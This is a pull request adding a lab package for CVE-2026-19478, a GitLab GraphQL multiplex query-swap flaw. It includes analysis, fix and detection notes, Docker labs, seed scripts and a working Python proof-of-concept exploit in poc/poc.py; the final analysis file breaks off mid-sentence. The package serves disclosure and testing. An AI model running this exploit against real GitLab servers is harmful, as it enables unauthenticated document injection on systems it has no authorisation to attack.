### PR TITLE
Add CVE-2026-19478 GitLab GraphQL Multiplex Query Swap (Unauthenticated Code Injection)

### DIFF
--- a/CVE-2026-19478/README.md
+++ b/CVE-2026-19478/README.md
@@ -1,0 +1,106 @@
+# CVE-2026-19478 - GitLab GraphQL Multiplex Query Swap (Unauthenticated Code Injection)
+
+> **Exploit Intelligence Platform** | [exploit-intel.com](https://exploit-intel.com) | [@exploit_intel](https://x.com/exploit_intel)
+
+## Vulnerability Summary
+
+| Field | Value |
+|---|---|
+| CVE | CVE-2026-19478 |
+| Component | [GitLab CE/EE](https://gitlab.com/gitlab-org/gitlab) GraphQL API (`/api/graphql`) |
+| Type | CWE-94: Improper Control of Generation of Code ('Code Injection') |
+| CVSS | 9.4 (Critical) — `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H` |
+| EPSS | n/a |
+| Affected | 18.2 before 18.11.11, 19.0 before 19.0.8, 19.1 before 19.1.6, 19.2 before 19.2.4 |
+| Fix | 18.11.11 / 19.0.8 / 19.1.6 / 19.2.4 (commit `d2ea4b97` + companion `e283c6ad`) |
+| Author | Exploit Intelligence Platform |
+| Date | 2026-08-18 |
+
+## Vulnerability Details
+
+GitLab's GraphQL `@gl_introduced` version filter hides fields introduced in newer
+versions so that queries written against a future release still run on an older
+server (rolling-deploy support). Its `IntroducedTracer`
+(`lib/gitlab/graphql/version_filter/introduced_tracer.rb`) filtered future fields
+out at parse time, remembered the ORIGINAL document, and swapped it back in at
+execution so the missing fields resolve to a nil fallback.
+
+The original document and the "contains future fields" flag were kept in flat
+instance variables on a tracer instance **shared across a GraphQL multiplex** (one
+POST carrying an array of queries). graphql-ruby parses all multiplex entries
+before executing any of them, so the last entry's state wins: when the LAST entry
+contains an `@gl_introduced` future field, EVERY entry's `@document` is replaced
+with the last entry's original, unfiltered document. Each victim entry's response
+slot, operation name, and variables are then applied to the attacker's document —
+unauthenticated remote GraphQL document injection. Mutation operations inside the
+injected document execute as well; on a stock install, runtime authorization still
+nullifies anonymous mutation effects. The vendor describes the maximum impact as
+unauthenticated modification/deletion of public projects and user data "under
+certain conditions".
+
+## Attack Chain
+
+1. Anonymous `POST /api/graphql` with a JSON array (multiplex) — no credentials.
+2. Entry[0]: a benign, valid query (the victim slot), e.g. `echo(text: $text)`.
+3. Entry[1] (LAST): the attacker document, containing a field gated by
+   `@gl_introduced(version: "<future>")` and sharing entry[0]'s operation name
+   (the swapped execution keeps the victim's memoized operation name).
+4. Vulnerable: entry[0]'s response contains the ATTACKER document's output, not
+   its own. With a 3-entry multiplex, ALL entries return the attacker document's
+   output. Fixed (19.2.4): each entry executes its own document.
+
+## Lab
+
+Stock official images; no custom image required. `docker-compose.yml` runs the
+vulnerable `gitlab/gitlab-ce:19.2.2-ce.0` (digest-pinned);
+`docker-compose.control.yml` runs the fixed `gitlab/gitlab-ce:19.2.4-ce.0`
+control on a sibling port. `seed.sh` waits for readiness, creates a synthetic
+root API token and one public project, and verifies anonymous GraphQL
+reachability.
+
+```bash
+./prepare-env.sh                    # creates runtime .env (synthetic credentials)
+docker compose --env-file .env -p cve-2026-19478-lab -f docker-compose.yml up -d
+./seed.sh                           # readiness + seed (first boot takes ~5-10 min)
+python3 poc/poc.py http://127.0.0.1:26956           # vulnerable -> [SUCCESS]
+
+docker compose --env-file .env -p cve-2026-19478-control -f docker-compose.control.yml up -d
+SEED_COMPOSE_FILE=docker-compose.control.yml SEED_PROJECT=cve-2026-19478-control SEED_PORT=26957 ./seed.sh
+python3 poc/poc.py http://127.0.0.1:26957 19.2.5    # fixed control -> [FAILED] (expected)
+```
+
+- Implementation: `poc/poc.py` (Python 3, stdlib only)
+- Runtime: Docker + docker compose; host ports 26956 (vulnerable) / 26957 (control), loopback only
+- Build: none — stock digest-pinned images
+- Run: `python3 poc/poc.py <base-url> [future-version]`
+
+## Fix Analysis
+
+Commit `d2ea4b97` ("Prevent query swapping with multiplexed queries and
+gl-introduced") keys the tracer's `{original_document, contain_future_fields}`
+state by the parsed document object instead of flat instance variables, so a
+query can only ever be swapped back to its OWN original document. Companion
+commit `e283c6ad` ("Prevent calling object method when resolving fallback
+field") routes fallback fields through `Resolvers::NilResolver` (always nil):
+previously `fallback_value: nil` still invoked the underlying object method when
+one existed, which would have run schema-hidden code for future-gated fields
+whose methods already shipped. Verified on the 19.2.4 control: with a
+genuinely-future field the per-entry fallback still works (`futureField: null`)
+and no cross-entry execution occurs.
+
+## Detection
+
+- Flag anonymous `POST /api/graphql` bodies that are JSON arrays containing
+  `gl_introduced` — the vulnerable path needs both.
+- Server-side: `NoMethodError: undefined method 'operation_type' for nil` with
+  `introduced_tracer.rb` in the backtrace is the swap executing with a
+  mismatched operation name.
+- On a vulnerable build, multiplex responses whose entries return byte-identical
+  `data` payloads are a swap signature.
+
+## References
+
+- Vendor advisory: <https://docs.gitlab.com/releases/patches/patch-release-gitlab-19-2-4-released/>
+- Fix commits: `d2ea4b971a985ae7c6ec83502a6bb57bb5a0cde8`, `e283c6ad` (v19.2.4-ee)
+- HackerOne report #3926431 (credit: hiimguardian). PoC written independently
+  from source/patch analysis; no public PoC existed at time of writing.

--- a/CVE-2026-19478/bypass_analysis.md
+++ b/CVE-2026-19478/bypass_analysis.md
@@ -1,0 +1,45 @@
+# Bypass & Variant Analysis: CVE-2026-19478
+
+Disclosure basis: this analysis covers ONLY the already-patched, already-disclosed
+fix shipped by the vendor on 2026-08-17 (advisory:
+https://docs.gitlab.com/releases/patches/patch-release-gitlab-19-2-4-released/).
+The lab report is `[PUBLIC]`; nothing here is unpatched or undisclosed.
+
+## Patch invariant and sufficiency
+
+Fixed invariant: **a query may only execute its own document.**
+`IntroducedTracer` (v19.2.4-ee) keys `{original_document, contain_future_fields}`
+by the parsed (filtered) document object; a query is swapped back only to its own
+original document and only when it itself contained future fields. Companion
+change: fallback fields resolve through `Resolvers::NilResolver` (always nil)
+instead of `fallback_value: nil`, which had still invoked the underlying object
+method when it existed.
+
+## Fixed-build bypass attempts (GitLab CE 19.2.4, FUTURE_VERSION=19.2.5)
+
+| # | Attempt | Outcome |
+|---|---|---|
+| 1 | 3-entry multiplex [victim echo, benign `__typename`, attacker future-field doc] | Each entry executed its own document; attacker entry got only its own fallback (`futureField: null`). No swap. |
+| 2 | Victim entry with explicit `operationName: "working"` | No swap; victim executed its own document. |
+| 3 | Mutation (`projectUpdate`) embedded in the future-field document | Victim entry executed its own query; the attacker entry errored on its own terms ("An operation name is required"); seeded public project unchanged. |
+
+`control held` — no bypass found within the bounded scope.
+
+## Same-class sibling search
+
+Searched the fixed build's first-party GraphQL tracing/filter code
+(`lib/gitlab/graphql/tracers/`, `lib/gitlab/graphql/version_filter/`, and the
+schema's `trace_with` registrations) for shared-instance-variable document or
+flag caching (`instance_variable_set(:@document`, `@original_query_document`,
+`@contain_future_fields`). Only `IntroducedTracer` ever held that pattern.
+`FutureFieldFilter`'s flag lives on a per-parse visitor instance;
+`InstrumentationTracer` performs logging/metrics only and mutates no execution
+state. Coverage limit: the search covered the release container's full `app/`
+and `lib/` for the exact pattern, not a whole-repo audit of unrelated subsystems.
+
+## Incidental findings
+
+None confirmed. Observation (not a new vulnerability, fixed alongside): on the
+vulnerable build the injected document executes under the victim entry's
+identity, so GitLab's GraphQL request logs record the victim's query string —
+a telemetry-fidelity consequence of the swap, not an independent defect.

--- a/CVE-2026-19478/docker-compose.control.yml
+++ b/CVE-2026-19478/docker-compose.control.yml
@@ -1,0 +1,29 @@
+services:
+  web:
+    image: gitlab/gitlab-ce:19.2.4-ce.0@sha256:1ac3eab1c0ea6162d6c8270d60aa77e8b48f16597c5308fff2a9df0e6f2af7cf
+    shm_size: 256m
+    ports:
+      - "127.0.0.1:${CONTROL_PORT}:80"
+    environment:
+      GITLAB_ROOT_PASSWORD: ${GITLAB_ROOT_PASSWORD}
+      GITLAB_OMNIBUS_CONFIG: |
+        external_url 'http://127.0.0.1:${CONTROL_PORT}'
+        puma['worker_processes'] = 2
+        sidekiq['concurrency'] = 5
+        prometheus_monitoring['enable'] = false
+        nginx['listen_port'] = 80
+    volumes:
+      - config:/etc/gitlab
+      - logs:/var/log/gitlab
+      - data:/var/opt/gitlab
+    healthcheck:
+      test: ["CMD-SHELL", "curl -sf http://localhost:80/users/sign_in || exit 1"]
+      interval: 10s
+      timeout: 5s
+      retries: 90
+      start_period: 180s
+
+volumes:
+  config:
+  logs:
+  data:

--- a/CVE-2026-19478/docker-compose.yml
+++ b/CVE-2026-19478/docker-compose.yml
@@ -1,0 +1,29 @@
+services:
+  web:
+    image: gitlab/gitlab-ce:19.2.2-ce.0@sha256:f7cf5de6f453623cfda9b7cc3708b1a29e82ea9be2dfaa91b5d7e7ed9aff9e6c
+    shm_size: 256m
+    ports:
+      - "127.0.0.1:${WEB_PORT}:80"
+    environment:
+      GITLAB_ROOT_PASSWORD: ${GITLAB_ROOT_PASSWORD}
+      GITLAB_OMNIBUS_CONFIG: |
+        external_url 'http://127.0.0.1:${WEB_PORT}'
+        puma['worker_processes'] = 2
+        sidekiq['concurrency'] = 5
+        prometheus_monitoring['enable'] = false
+        nginx['listen_port'] = 80
+    volumes:
+      - config:/etc/gitlab
+      - logs:/var/log/gitlab
+      - data:/var/opt/gitlab
+    healthcheck:
+      test: ["CMD-SHELL", "curl -sf http://localhost:80/users/sign_in || exit 1"]
+      interval: 10s
+      timeout: 5s
+      retries: 90
+      start_period: 180s
+
+volumes:
+  config:
+  logs:
+  data:

--- a/CVE-2026-19478/intel_brief.md
+++ b/CVE-2026-19478/intel_brief.md
@@ -1,0 +1,63 @@
+# CVE-2026-19478 — Intel Brief
+
+## Overview
+
+| Field | Value |
+|---|---|
+| CVE ID | CVE-2026-19478 |
+| Title | Improper Control of Generation of Code ('Code Injection') in GitLab |
+| Affected software | GitLab CE/EE (self-managed, all deployment types) |
+| Vendor | GitLab |
+| CVSS | 9.4 CRITICAL — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H |
+| EPSS | n/a (not scored at time of writing) |
+| CWE | CWE-94 (Improper Control of Generation of Code) |
+| Published | 2026-08-17 |
+| Exploited in the wild | No known exploitation (not in CISA KEV / VulnCheck KEV at time of writing) |
+| Other IDs | HackerOne report #3926431 (reporter: hiimguardian); GitLab work item 611377 |
+
+## Affected versions
+
+| Branch | Vulnerable range | Patched version |
+|---|---|---|
+| 18.11 | 18.2 up to (not including) 18.11.11 | 18.11.11 |
+| 19.0 | 19.0 up to (not including) 19.0.8 | 19.0.8 |
+| 19.1 | 19.1 up to (not including) 19.1.6 | 19.1.6 |
+| 19.2 | 19.2 up to (not including) 19.2.4 | 19.2.4 |
+
+Note: 19.2.3 was an internal-only security build; the last public vulnerable
+19.2 release is 19.2.2.
+
+## Description
+
+GitLab remediated a critical code-injection issue in its GraphQL API. Under
+certain conditions an unauthenticated remote user could modify or delete public
+projects and user data via a GraphQL directive. The vendor patched the issue on
+2026-08-17 in 18.11.11 / 19.0.8 / 19.1.6 / 19.2.4; GitLab.com was already
+patched.
+
+## Root-cause summary
+
+GitLab's GraphQL `@gl_introduced` version filter hides fields introduced in
+newer versions. Its `IntroducedTracer` kept the "original query document" and a
+"contains future fields" flag in instance variables on a tracer object shared
+across a GraphQL **multiplex** (a single POST carrying an array of queries).
+All multiplex entries are parsed before any executes, so the last entry's state
+wins: if the last entry contains an `@gl_introduced` future field, every entry
+is executed with the LAST entry's original, unfiltered document swapped in.
+An attacker-controlled GraphQL document therefore executes in the slot of a
+different, separately validated query — remote GraphQL document injection
+without authentication. A companion fix stops the future-field fallback from
+invoking the underlying object method (fallback fields now resolve through a
+`NilResolver` that always returns nil).
+
+Fix: commit `d2ea4b97` ("Prevent query swapping with multiplexed queries and
+gl-introduced", security MR gitlab-org/security/gitlab!6570) keys tracer state
+per parsed document; commit `e283c6ad` ("Prevent calling object method when
+resolving fallback field", security MR !6565) introduces `Resolvers::NilResolver`.
+
+## References
+
+- Vendor advisory: https://docs.gitlab.com/releases/patches/patch-release-gitlab-19-2-4-released/
+- GitLab work item: https://gitlab.com/gitlab-org/gitlab/-/work_items/611377
+- HackerOne: https://hackerone.com/reports/3926431
+- Source: https://gitlab.com/gitlab-org/gitlab (v19.2.2-ee vulnerable, v19.2.4-ee fixed)

--- a/CVE-2026-19478/lab.env.example
+++ b/CVE-2026-19478/lab.env.example
@@ -1,0 +1,9 @@
+# CVE-2026-19478 lab environment template (non-secret).
+# prepare-env.sh turns this into the runtime .env (mode 0600; keep it out of any VCS).
+COMPOSE_PROJECT_NAME=cve-2026-19478-lab
+WEB_PORT=26956
+CONTROL_PORT=26957
+# Synthetic, disposable lab credentials. Leave empty here; prepare-env.sh
+# generates fresh random values. Never commit a filled-in .env.
+GITLAB_ROOT_PASSWORD=
+LAB_ROOT_TOKEN=

--- a/CVE-2026-19478/lab_build_report.md
+++ b/CVE-2026-19478/lab_build_report.md
@@ -1,0 +1,37 @@
+# Lab Build Report: CVE-2026-19478
+
+## Topology
+Two independent single-service Compose environments, each a stock official
+GitLab CE omnibus container (digest-pinned), publishing HTTP on loopback only.
+No custom images are built — "no custom image required"; the compose files,
+`seed.sh`, and `prepare-env.sh` are the whole lab.
+
+## Build and seed
+- `docker-compose.yml`: `gitlab/gitlab-ce:19.2.2-ce.0@sha256:f7cf5de6f453623cfda9b7cc3708b1a29e82ea9be2dfaa91b5d7e7ed9aff9e6c` (vulnerable; 19.2.3 was an internal-only security build, so 19.2.2 is the last public vulnerable release).
+- `docker-compose.control.yml`: `gitlab/gitlab-ce:19.2.4-ce.0@sha256:1ac3eab1c0ea6162d6c8270d60aa77e8b48f16597c5308fff2a9df0e6f2af7cf` (fixed control). Mirrored config: identical omnibus settings (`puma['worker_processes'] = 2`, `sidekiq['concurrency'] = 5`, Prometheus off, `nginx['listen_port'] = 80`), own project name, own volumes, sibling port.
+- `prepare-env.sh` creates the runtime `.env` (mode 0600) from `lab.env.example` with freshly generated synthetic credentials (`GITLAB_ROOT_PASSWORD`, `LAB_ROOT_TOKEN`). The `.env` is runtime state and is never committed.
+- `seed.sh` waits for `GET /users/sign_in == 200`, creates a root personal access token via `gitlab-rails runner`, creates public project `root/public-target`, verifies it via the REST API, and verifies anonymous GraphQL (`echo`) reachability. Idempotent; parameterizable via `SEED_COMPOSE_FILE` / `SEED_PROJECT` / `SEED_PORT` for the control environment.
+
+## Environments
+| Project | Build | Port (loopback) | Purpose |
+|---|---|---|---|
+| `cve-2026-19478-lab` | GitLab CE 19.2.2 | 127.0.0.1:26956 | vulnerable target |
+| `cve-2026-19478-control` | GitLab CE 19.2.4 | 127.0.0.1:26957 | fixed-build control |
+
+Ports derived from the CVE id (LAB_PORT = 20000 + (202619478 % 4000) * 2 = 26956;
+CONTROL_PORT = 26957). Both were free at first `up`; no deviation.
+
+## URLs
+- Vulnerable GraphQL endpoint: `http://127.0.0.1:26956/api/graphql`
+- Control GraphQL endpoint: `http://127.0.0.1:26957/api/graphql`
+
+## Notes
+- First boot runs the full omnibus reconfigure; allow ~5-10 minutes (observed
+  ~3 minutes warm-image). Readiness is gated on `/users/sign_in` because the
+  `/-/readiness` and `/-/health` monitoring endpoints 404 through nginx unless
+  the client IP is in GitLab's monitoring whitelist (Docker bridge IPs are not).
+- `nginx['listen_port'] = 80` is pinned explicitly: omnibus otherwise derives the
+  nginx listen port from `external_url`, which would bind nginx to 26956/26957
+  inside the container while Docker publishes to container port 80.
+- Synthetic lab credentials only; the attack itself is anonymous and needs no token.
+  The token exists solely for seeding and post-run state verification.

--- a/CVE-2026-19478/poc/poc.py
+++ b/CVE-2026-19478/poc/poc.py
@@ -1,0 +1,145 @@
+#!/usr/bin/env python3
+# ──────────────────────────────────────────────────────────────────────
+# Exploit Title  : GitLab CE/EE - GraphQL Multiplex Query Swap (Code Injection)
+# CVE            : CVE-2026-19478
+# Vendor         : GitLab
+# Product        : GitLab CE/EE
+# Affected       : 18.2 before 18.11.11, 19.0 before 19.0.8, 19.1 before 19.1.6, 19.2 before 19.2.4
+# Type           : CWE-94 - Improper Control of Generation of Code ('Code Injection')
+# CVSS           : 9.4 (Critical)
+# Platform       : linux
+# Author         : Exploit Intelligence Platform
+# Website        : https://exploit-intel.com
+# Twitter        : @exploit_intel
+# Date           : 2026-08-18
+#
+# For authorized security testing and educational purposes only.
+# ──────────────────────────────────────────────────────────────────────
+"""
+CVE-2026-19478 — GitLab GraphQL multiplex query swap (unauthenticated code injection)
+
+GitLab's @gl_introduced version filter hides fields introduced in newer
+versions. Its IntroducedTracer keeps the "original query document" and a
+"contains future fields" flag in instance variables on a tracer object shared
+across a GraphQL multiplex. Multiplex entries are all parsed before any
+executes, so when the LAST entry contains an @gl_introduced future field, every
+entry is executed with the last entry's original document swapped in. An
+unauthenticated attacker's GraphQL document thereby executes in the slot of a
+different, separately validated query: remote GraphQL document injection.
+Mutation operations inside the injected document are executed (on a stock
+anonymous session, runtime authorization still nullifies their effects).
+
+ATTACK CHAIN:
+  1. POST an anonymous GraphQL multiplex to /api/graphql.
+  2. Entry[0] is a benign validated query ("victim" slot).
+  3. Entry[1] (LAST) carries an @gl_introduced future field plus the attacker
+     document, sharing entry[0]'s operation name so the swapped execution
+     resolves find_operation() against the attacker document.
+  4. Vulnerable: entry[0]'s response contains the attacker document's output,
+     not its own. Fixed (19.2.4+): each entry executes its own document.
+"""
+import json
+import sys
+import urllib.request
+
+# Any version newer than the vulnerable server marks the field as "future".
+# Overridable as argv[2]: the patched control (19.2.4) needs a version that is
+# future relative to IT (e.g. 19.2.5), otherwise the negative would come from
+# version semantics rather than from the fix.
+FUTURE_VERSION = "19.2.3"
+
+# Victim slot: a valid anonymous query whose execution is variable-driven, so a
+# swapped document is unmistakable (the marker can only come from doc 2).
+VICTIM_QUERY = "query working($text: String!) { echo(text: $text) }"
+VICTIM_VARS = {"text": "ENTRY0-MARKER"}
+
+# Attacker document: shares the victim's operation name ("working") because the
+# swapped execution keeps the victim entry's memoized operation name; a
+# different name yields NoMethodError instead of execution. The @gl_introduced
+# future field is what flips the shared tracer flag that triggers the swap.
+def attacker_doc(future_version):
+    return (
+        'query working { echo(text: "INJECTED-BY-DOC1") '
+        f'futureField @gl_introduced(version: "{future_version}")' ' }'
+    )
+INJECTED_MARKER = "INJECTED-BY-DOC1"
+
+
+def post(base, payload):
+    """Anonymous POST to the GraphQL endpoint; returns decoded JSON."""
+    req = urllib.request.Request(
+        base.rstrip("/") + "/api/graphql",
+        data=json.dumps(payload).encode(),
+        headers={"Content-Type": "application/json"},
+        method="POST",
+    )
+    with urllib.request.urlopen(req, timeout=30) as resp:
+        return json.loads(resp.read().decode())
+
+
+def main(base, future_version=FUTURE_VERSION):
+    # Step 1 — baseline: anonymous GraphQL must be reachable, otherwise the
+    # target is not in the attack's precondition state.
+    base_resp = post(base, {"query": '{ echo(text: "probe") }'})
+    echo = (base_resp.get("data") or {}).get("echo", "")
+    if "says: probe" not in echo:
+        print(f"[-] baseline anonymous echo failed: {base_resp!r}")
+        print("[FAILED]")
+        return 1
+    print(f"[+] baseline anonymous GraphQL OK: {echo}")
+
+    # Step 2 — swap attempt: attacker document in the LAST multiplex entry.
+    swap_resp = post(base, [
+        {"query": VICTIM_QUERY, "variables": VICTIM_VARS},
+        {"query": attacker_doc(future_version)},
+    ])
+    if not isinstance(swap_resp, list) or len(swap_resp) != 2:
+        print(f"[-] unexpected multiplex response shape: {swap_resp!r}")
+        print("[FAILED]")
+        return 1
+    e0 = (swap_resp[0].get("data") or {})
+    e1 = (swap_resp[1].get("data") or {})
+    print(f"[*] swap entry[0]: {json.dumps(e0)}")
+    print(f"[*] swap entry[1]: {json.dumps(e1)}")
+
+    # The swap fired iff entry[0] produced the attacker document's hardcoded
+    # marker (and the future-field key) instead of its own variable's value.
+    swapped = (
+        INJECTED_MARKER in (e0.get("echo") or "")
+        and "futureField" in e0
+        and "ENTRY0-MARKER" not in (e0.get("echo") or "")
+    )
+
+    # Step 3 — ordering control: with the attacker document FIRST, no swap may
+    # occur (the shared flag is left false by the last-parsed benign entry), so
+    # entry[1] must execute its own document. This distinguishes the
+    # vulnerability from any always-on response-shape quirk.
+    ctl_resp = post(base, [
+        {"query": attacker_doc(future_version)},
+        {"query": VICTIM_QUERY, "variables": VICTIM_VARS},
+    ])
+    ctl1 = (ctl_resp[1].get("data") or {}) if isinstance(ctl_resp, list) else {}
+    print(f"[*] order-control entry[1]: {json.dumps(ctl1)}")
+    order_ok = "ENTRY0-MARKER" in (ctl1.get("echo") or "")
+
+    if swapped and order_ok:
+        print("[VULNERABLE] entry[0] executed the attacker document from "
+              "entry[1] (multiplex query swap); ordering control clean.")
+        print("[SUCCESS]")
+        return 0
+
+    if not swapped and order_ok and "ENTRY0-MARKER" in (e0.get("echo") or ""):
+        print("[FIXED] each multiplex entry executed its own document.")
+        print("[FAILED]")
+        return 1
+
+    print(f"[?] inconclusive: swapped={swapped} order_ok={order_ok}")
+    print("[FAILED]")
+    return 1
+
+
+if __name__ == "__main__":
+    if len(sys.argv) not in (2, 3):
+        print(f"usage: {sys.argv[0]} http://127.0.0.1:PORT [future-version]")
+        sys.exit(2)
+    sys.exit(main(sys.argv[1], *(sys.argv[2:3])))

--- a/CVE-2026-19478/poc_verification_report.md
+++ b/CVE-2026-19478/poc_verification_report.md
@@ -1,0 +1,61 @@
+# PoC Verification Report: CVE-2026-19478
+
+## Verdict
+**[SUCCESS]** — unauthenticated GraphQL document injection on GitLab CE 19.2.2:
+a multiplex entry executes the attacker-chosen document from the last entry
+(multiplex query swap), proven against a cold-built stock lab, 3/3 from cold state.
+
+## Environment
+| Component | Vulnerable target | Control target |
+|---|---|---|
+| Image | `gitlab/gitlab-ce:19.2.2-ce.0@sha256:f7cf5de6…9aff9e6c` | `gitlab/gitlab-ce:19.2.4-ce.0@sha256:1ac3eab1…f2af7cf` |
+| Build (verified in container) | GitLab 19.2.2 | GitLab 19.2.4 |
+| Compose project | `cve-2026-19478-lab` | `cve-2026-19478-control` |
+| graphql-ruby | 2.6.3 | 2.6.3 |
+| Ports | 127.0.0.1:26956 | 127.0.0.1:26957 |
+| Seed | synthetic root PAT + public project `root/public-target` | identical (own project/volumes) |
+
+## Results
+
+| Run | State | Outcome | Key measurements |
+|---|---|---|---|
+| development | warm | [SUCCESS] | entry[0] returned attacker doc marker `INJECTED-BY-DOC1` + `futureField` key |
+| cold 1/3 | cold rebuild | [SUCCESS] | swap reproduced; ordering control clean |
+| cold 2/3 | cold rebuild | [SUCCESS] | swap reproduced; ordering control clean |
+| cold 3/3 | cold rebuild | [SUCCESS] | swap reproduced; ordering control clean |
+| control | 19.2.4, FUTURE_VERSION=19.2.5 | [FAILED] (expected) | every entry executed its own document; per-entry future-field fallback intact |
+
+**Reproduction ratio: 3/3 from cold state.**
+
+## Impact boundary (honest)
+
+- Proven, unauthenticated: full substitution of the executed GraphQL document for
+  every multiplex entry; 3-entry multiplex on 19.2.2 returned the attacker
+  document's output in ALL three response slots. Mutation operations in the
+  injected document execute (a `projectUpdate` attempt ran).
+- Not reproduced on stock config: actual anonymous data modification — runtime
+  authorization nullified the anonymous mutation (seeded public project
+  unchanged). The vendor's "modify or delete public projects and user data"
+  holds "under certain conditions" not present in a stock release build (no
+  future-gated fields with live methods ship in releases; anonymous mutation
+  authorization held).
+
+## Control notes
+
+The authoritative control run passes `19.2.5` as the future version so the field
+is future relative to BOTH builds; a first control run with the default `19.2.3`
+was rejected as evidence because 19.2.3 is past relative to 19.2.4 (negative
+attributable to version semantics, not the fix). On 19.2.4 with 19.2.5 the fix
+is confirmed by behavior: entry[0] executes its own document AND entry[1] still
+receives its own legitimate future-field fallback (`futureField: null`).
+
+## Bypass & Variant Analysis (non-sensitive summary)
+
+The patched invariant — a query may only execute its own document — held against
+three fixed-build bypass attempts: a 3-entry multiplex with the attacker document
+last, a victim entry with explicit `operationName`, and a mutation embedded in
+the future-field document. Sibling search across the fixed build's GraphQL
+tracing/filter modules found no other shared-instance-variable document caching;
+`FutureFieldFilter` state is per-parse and `InstrumentationTracer` touches no
+execution state. No unpatched bypass or variant found; disclosure is PUBLIC per
+the vendor's published advisory and fix.

--- a/CVE-2026-19478/prepare-env.sh
+++ b/CVE-2026-19478/prepare-env.sh
@@ -1,0 +1,13 @@
+#!/bin/bash
+# Creates the runtime .env for the CVE-2026-19478 lab from lab.env.example.
+# The .env is mode 0600 and must stay out of version control.
+set -euo pipefail
+cd "$(dirname "$0")"
+umask 077
+[ -f .env ] && { echo ".env already exists; refusing to overwrite"; exit 1; }
+PW=$(openssl rand -hex 16)
+TOK="eip-lab-$(openssl rand -hex 16)"
+sed -e "s/^GITLAB_ROOT_PASSWORD=.*/GITLAB_ROOT_PASSWORD=$PW/" \
+    -e "s/^LAB_ROOT_TOKEN=.*/LAB_ROOT_TOKEN=$TOK/" lab.env.example > .env
+chmod 600 .env
+echo "[+] .env created (mode 600). Synthetic lab-only credentials generated."

--- a/CVE-2026-19478/seed.sh
+++ b/CVE-2026-19478/seed.sh
@@ -1,0 +1,68 @@
+#!/bin/bash
+# Seed for CVE-2026-19478 lab: create a root API token and one public project.
+# Idempotent: safe to re-run. Credentials are synthetic lab-only values sourced
+# from lab/.env (mode 0600); never printed.
+set -euo pipefail
+LAB_DIR="$(cd -- "$(dirname -- "${BASH_SOURCE[0]}")" && pwd)"
+set -a
+. "$LAB_DIR/.env"
+set +a
+cd "$LAB_DIR"
+: "${WEB_PORT:?set WEB_PORT in lab/.env}"
+: "${GITLAB_ROOT_PASSWORD:?set GITLAB_ROOT_PASSWORD in lab/.env}"
+: "${LAB_ROOT_TOKEN:?set LAB_ROOT_TOKEN in lab/.env}"
+
+SEED_COMPOSE_FILE="${SEED_COMPOSE_FILE:-docker-compose.yml}"
+SEED_PROJECT="${SEED_PROJECT:-$COMPOSE_PROJECT_NAME}"
+SEED_PORT="${SEED_PORT:-$WEB_PORT}"
+COMPOSE=(docker compose --env-file "$LAB_DIR/.env" -p "$SEED_PROJECT" -f "$LAB_DIR/$SEED_COMPOSE_FILE")
+BASE="http://127.0.0.1:${SEED_PORT}"
+
+# 1. Readiness gate on the published host port.
+for i in $(seq 1 60); do
+  curl -sf "$BASE/users/sign_in" > /dev/null 2>&1 && break
+  sleep 5
+  [ "$i" -eq 60 ] && { "${COMPOSE[@]}" logs web; exit 1; }
+done
+echo "[+] GitLab readiness OK"
+
+# 2. Deterministic root personal access token (synthetic, lab-local only).
+"${COMPOSE[@]}" exec -T -e "LAB_ROOT_TOKEN=$LAB_ROOT_TOKEN" web gitlab-rails runner "
+u = User.find_by_username('root')
+t = PersonalAccessToken.find_or_initialize_by(user: u, name: 'eip-lab')
+t.scopes = ['api']
+t.expires_at = 365.days.from_now
+t.set_token(ENV['LAB_ROOT_TOKEN'])
+t.save!
+puts 'token-ok'
+" >/dev/null
+echo "[+] Root API token ensured"
+
+# 3. One public project to act as the modification/deletion target.
+if ! curl -sf -H "PRIVATE-TOKEN: $LAB_ROOT_TOKEN" "$BASE/api/v4/projects/$(printf 'root%%2Fpublic-target')" >/dev/null 2>&1; then
+  curl -sf -X POST -H "PRIVATE-TOKEN: $LAB_ROOT_TOKEN" \
+    --data-urlencode "name=public-target" \
+    --data-urlencode "path=public-target" \
+    --data-urlencode "visibility=public" \
+    --data-urlencode "initialize_with_readme=true" \
+    "$BASE/api/v4/projects" > /dev/null
+  echo "[+] Public project created"
+fi
+
+# 4. Verify seeded state through the target's own API; fail closed.
+for i in $(seq 1 30); do
+  VIS=$(curl -sf -H "PRIVATE-TOKEN: $LAB_ROOT_TOKEN" "$BASE/api/v4/projects/root%2Fpublic-target" | jq -r '.visibility' 2>/dev/null || true)
+  [ "$VIS" = "public" ] && { echo "[+] Seed verified: root/public-target is public"; break; }
+  sleep 2
+  [ "$i" -eq 30 ] && { echo "[-] Seed verification failed"; exit 1; }
+done
+
+# 5. Verify anonymous GraphQL reachability (no credentials).
+ANON=$(curl -sf -X POST -H 'Content-Type: application/json' \
+  -d '{"query":"{ echo(text: \"probe\") }"}' "$BASE/api/graphql" | jq -r '.data.echo' 2>/dev/null || true)
+case "$ANON" in
+  *"says: probe") echo "[+] Anonymous GraphQL OK: $ANON" ;;
+  *) echo "[-] Anonymous GraphQL probe failed"; exit 1 ;;
+esac
+
+printf '[+] URL: %s  auth: AUTH_MATERIAL_REF=LAB_ROOT_TOKEN in lab/.env (synthetic)\n' "$BASE"

--- a/CVE-2026-19478/vulnerability_analysis.md
+++ b/CVE-2026-19478/vulnerability_analysis.md
@@ -1,0 +1,149 @@
+# CVE-2026-19478 — Vulnerability Analysis
+
+## Entrypoint
+
+`POST /api/graphql` (and `POST /graphql`) on GitLab CE/EE accepts either a
+single GraphQL request object or a **multiplex**: a JSON array of request
+objects, executed by `GraphQL::Execution::Interpreter` as one multiplex. No
+authentication is required for queries against public data.
+
+## Vulnerable code
+
+`lib/gitlab/graphql/version_filter/introduced_tracer.rb` @ v19.2.2-ee:
+
+```ruby
+def parse(query_string:)
+  @original_query_document = super
+  @contain_future_fields = false
+
+  filter = Gitlab::Graphql::VersionFilter::FutureFieldFilter.new(@original_query_document.dup)
+
+  filter.visit.tap do
+    @contain_future_fields = filter.contain_future_fields
+  end
+end
+
+def execute_query(query:)
+  return super unless @contain_future_fields
+
+  # Use the original query during execution so we can fallback to null for the missing fields
+  query.instance_variable_set(:@document, @original_query_document)
+  query.send(:prepare_ast)
+  query.context[:contain_future_fields] = @contain_future_fields
+
+  super
+end
+```
+
+The tracer exists to support "future fields": a query written against a newer
+GitLab version may reference fields gated by `@gl_introduced(version: "X")`
+where X is newer than the server. `parse` filters those fields out for
+validation, remembers the ORIGINAL document, and `execute_query` swaps the
